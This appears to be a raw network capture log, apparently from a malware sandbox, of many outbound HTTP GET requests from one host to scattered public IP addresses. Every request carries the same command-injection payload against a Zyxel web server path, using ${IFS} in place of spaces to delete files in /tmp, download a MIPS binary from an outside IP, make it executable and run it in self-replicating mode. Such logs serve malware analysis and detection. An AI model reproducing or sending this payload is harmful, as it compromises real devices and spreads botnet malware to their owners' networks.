                                      Jan 14, 2024 15:50:36.049618959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1706192.168.2.144096217.92.216.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049650908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1707192.168.2.144536884.87.161.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049671888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1708192.168.2.145031471.140.196.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049738884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1709192.168.2.1454774152.86.225.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049792051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1710192.168.2.143675474.241.176.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049820900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1711192.168.2.144596819.40.62.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049823999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1712192.168.2.1437892116.97.119.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049892902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1713192.168.2.1436628163.177.164.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049947977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1714192.168.2.1454162208.142.173.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049990892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1715192.168.2.1434354163.175.91.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050015926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1716192.168.2.1450190140.42.204.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050060987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1717192.168.2.143734241.247.193.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050103903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1718192.168.2.144352019.118.249.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050149918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1719192.168.2.143409437.164.184.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050167084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1720192.168.2.1432844167.2.21.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050206900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1721192.168.2.1454130144.45.56.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050231934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1722192.168.2.146030862.125.131.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050286055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1723192.168.2.14595185.113.144.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050314903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1724192.168.2.1440550149.194.47.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050347090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1725192.168.2.1436746136.211.246.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050405025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1726192.168.2.1445302210.150.208.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050436974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1727192.168.2.145747683.113.174.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050473928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1728192.168.2.1441372191.217.133.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050529003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1729192.168.2.143444080.0.59.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050587893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1730192.168.2.1445040152.211.100.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050632954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1731192.168.2.143848217.70.51.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050678015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1732192.168.2.1438008131.135.188.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050700903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1733192.168.2.1452774198.177.173.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050761938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1734192.168.2.1432960160.160.95.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050820112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1735192.168.2.143878893.231.36.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050865889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1736192.168.2.1452880135.201.42.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050925970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1737192.168.2.1453230150.55.51.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.050977945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1738192.168.2.1444206101.159.164.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051006079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1739192.168.2.1440460213.98.129.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051047087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1740192.168.2.1459544206.148.164.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051084042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1741192.168.2.144449250.200.45.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051114082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1742192.168.2.14478022.194.176.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051170111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1743192.168.2.1459444143.226.230.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051193953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1744192.168.2.145781065.208.211.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051251888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1745192.168.2.144327483.38.97.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051299095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1746192.168.2.1435956129.136.0.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051327944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1747192.168.2.144203414.88.85.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051371098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1748192.168.2.145347052.53.15.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051395893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1749192.168.2.1437554221.142.35.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051440001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1750192.168.2.1440194180.150.114.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051487923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1751192.168.2.1442868132.38.153.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051515102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1752192.168.2.1440410217.201.25.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051548958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1753192.168.2.1459998119.104.134.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051584959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1754192.168.2.1436824201.185.186.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051625967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1755192.168.2.145540666.180.8.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051676035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1756192.168.2.1439020169.7.169.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051723003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1757192.168.2.1434012172.255.70.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051760912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1758192.168.2.1452442187.92.183.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051791906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1759192.168.2.146051436.51.27.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051831961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1760192.168.2.144217263.185.167.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051888943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1761192.168.2.1438156197.241.252.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051923990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1762192.168.2.1439842174.189.221.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.051963091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1763192.168.2.1433226123.84.230.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052014112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1764192.168.2.144809876.253.114.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052061081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1765192.168.2.143668032.53.51.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052103043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1766192.168.2.1435874147.34.183.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052143097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1767192.168.2.146018881.134.110.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052189112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1768192.168.2.145487258.65.199.125443
                                      TimestampBytes transferredDirectionData
